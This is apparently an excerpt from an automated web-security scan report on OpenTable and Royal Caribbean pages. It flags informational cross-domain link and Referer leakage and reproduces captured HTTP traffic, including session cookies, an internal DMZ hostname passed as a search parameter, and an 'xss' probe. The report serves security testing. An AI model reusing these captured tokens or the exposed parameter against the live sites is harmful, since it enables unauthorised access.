<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24052481&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23810517&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23761271&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23727521&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23678407&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23594671&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/rating.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23586891&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVDI_FBImage"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/filteringBusy.gif" alt="Filtering is in progress. Please wait until it completes." title="Filtering is in progress. Please wait until it completes."/></div>
...[SNIP]...
<div id="" class="BVRRTrackerImage "><img src="http://opentable.ugc.bazaarvoice.com/static/0938/r_5_ispacer.gif" alt=""/></div>
...[SNIP]...
<dt id="RestaurantProfile_RestProfileGroupDiningTab_SlideShowControl_RestaurantProfileToolbar_toolbarMap" class="mapIcon">
               <a id="RestaurantProfile_RestProfileGroupDiningTab_SlideShowControl_RestaurantProfileToolbar_linkMapLink" class="mapIconLink" rel="nofollow" href="http://maps.google.com/?hl=en&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=401+Taylor+St.,San+Francisco,CA,94102" target="_blank"></a>
           </dt>
           <dd id="RestaurantProfile_RestProfileGroupDiningTab_SlideShowControl_RestaurantProfileToolbar_toolbarMapLink" class="map">    
               <a id="RestaurantProfile_RestProfileGroupDiningTab_SlideShowControl_RestaurantProfileToolbar_linkMapLinkText" class="ToolbarLinkText" rel="nofollow" href="http://maps.google.com/?hl=en&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=401+Taylor+St.,San+Francisco,CA,94102" target="_blank">Map</a>
...[SNIP]...
<div class="ViewSampleMenuWrapper">
               <a id="RestaurantProfile_RestProfileGroupDiningTab_linkViewSampleMenu" class="ViewSampleMenu" href="http://www.serranohotel.com/pdf/jaspers_menu_banquets.pdf" target="_blank">View Sample Menu &rsaquo;</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://o.opentable.com/b/ss/otrestref/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...
17.48. http://www.opentable.com/opentables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://o.opentable.com/b/ss/otrestref/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...
17.49. http://www.royalcaribbean.com/beforeyouboard/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.royalcaribbean.com
Path:   /beforeyouboard/home.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /beforeyouboard/home.do?cS=NAVBAR HTTP/1.1
Host: www.royalcaribbean.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Ahome%25253Ahomepagenobookingus%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.royalcaribbean.com%25252Fbeforeyouboard%25252Fhome.do%25253FcS%25253DNAVBAR%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 55078
Date: Mon, 03 Oct 2011 12:41:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

   
           <!--BEGIN MA
...[SNIP]...
<li class="face"><a target="_blank" href="http://www.facebook.com/royalcaribbean" class="socialIcn"><img border="0" alt="Facebook" name="related_topic~~1~~icon_image" src="img/social_media_icons/facebook-sub.gif"></a>
<iframe frameborder="0" scrolling="no" allowtransparency="true" style="border:none; overflow:hidden; width:85px; height:21px;" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&amp;send=false&amp;layout=button_count&amp;width=85&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=21"></iframe></li>
<li><a target="_blank" href="http://www.twitter.com/royalcaribbean" class="socialIcn"><img border="0" alt="Twitter" name="related_topic~~2~~icon_image" src="img/social_media_icons/twitter-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://www.youtube.com/royalcaribbeanintl" class="socialIcn"><img border="0" alt="YouTube" name="related_topic~~3~~icon_image" src="img/social_media_icons/youtube-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://www.nationofwhynot.com/blog/" class="socialIcn"><img border="0" alt="President's Blog" name="related_topic~~4~~icon_image" src="img/social_media_icons/blog-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://www.flickr.com/photos/royalcaribbeanintl" class="socialIcn"><img border="0" alt="Flickr" name="related_topic~~5~~icon_image" src="img/social_media_icons/flickr-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://feeds2.feedburner.com/WhyNotRecentPosts" class="socialIcn"><img border="0" alt="RSS News Feed " name="related_topic~~6~~icon_image" src="img/social_media_icons/rss-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://itunes.apple.com/us/app/royal-caribbean-international/id402771489?mt=8&amp;uo=4" class="socialIcn"><img border="0" alt="iPhone App" name="related_topic~~7~~icon_image" src="img/social_media_icons/mobile-sub.gif">
...[SNIP]...
17.50. http://www.royalcaribbean.com/dealsandmore/hotdeals.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.royalcaribbean.com
Path:   /dealsandmore/hotdeals.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1 HTTP/1.1
Host: www.royalcaribbean.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Asearch%25253AprocessSearch%25253Asitesearchinital%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.royalcaribbean.com%25252Fdealsandmore%25252Fhotdeals.do%25253FcS%25253DNAVBAR%252526pnav%25253D3%252526snav%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 201167
Date: Mon, 03 Oct 2011 12:44:48 GMT
Connection: close

<!DOCTYPE html>


           <html>


<head>


   <meta charset="UTF-8">
   <meta name="keywords" content=""/>
   <meta name="description" content=""/>
   
   <link rel="canonical
...[SNIP]...
<!-- this jquery declaration is needed here because it is not visible from the R_Browse_Layout.jsp parent file -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.js"></script>
...[SNIP]...
<li class="noBorder">
                   <a href='http://rcic2c.cvpchat.com/310/alivec2c/?groupid=310&websiteid=0'
                   title="WE'LL CALL YOU NOW"
                   class=""
                   target='popup'
                   onclick="javascript:linkCode(this,'ClickToCall'); myBase.popup(this.href, 430,490,1); return false;">
                   <span>
...[SNIP]...
<li class="noBorder">
                   <a href='http://www.cvpchat.com/1/rRouter.asp?groupid=1&amp;websiteid=0&amp;departmentid=0&amp;dl='
                   title="LIVE CHAT"
                   class=""
                   target='popup'
                   onclick="javascript:linkCode(this,'LiveChat'); myBase.popup(this.href, 430,490,1); return false;">
                   <span>
...[SNIP]...
</a>
               
                   <a href='http://rcic2c.cvpchat.com/310/alivec2c/?groupid=310&websiteid=0'
                       title="WE'LL CALL YOU NOW"
                       class="blueButton"
                       target='popup'
                       onclick="javascript:linkCode(this,'ClickToCall'); myBase.popup(this.href, 430,490,1); return false;">
                       <span>
...[SNIP]...
</a>
               
                   <a href='http://www.cvpchat.com/1/rRouter.asp?groupid=1&amp;websiteid=0&amp;departmentid=0&amp;dl='
                       title="LIVE CHAT"
                       class="blueButton"
                       target='popup'
                       onclick="javascript:linkCode(this,'LiveChat'); myBase.popup(this.href, 430,490,1); return false;">
                       <span>
...[SNIP]...
<!-- The following Coding is for Adevrtising.com Pixel Web Beacon ---- -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=cruisebooking_cs=1&betq=1137=352352" width="1" height="1" border="0">
<!-- The preceding Coding is for Adevrtising.com Pixel Web Beacon ---- -->
...[SNIP]...
17.51. http://www.royalcaribbean.com/search/processSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.royalcaribbean.com
Path:   /search/processSearch.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss HTTP/1.1
Host: www.royalcaribbean.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
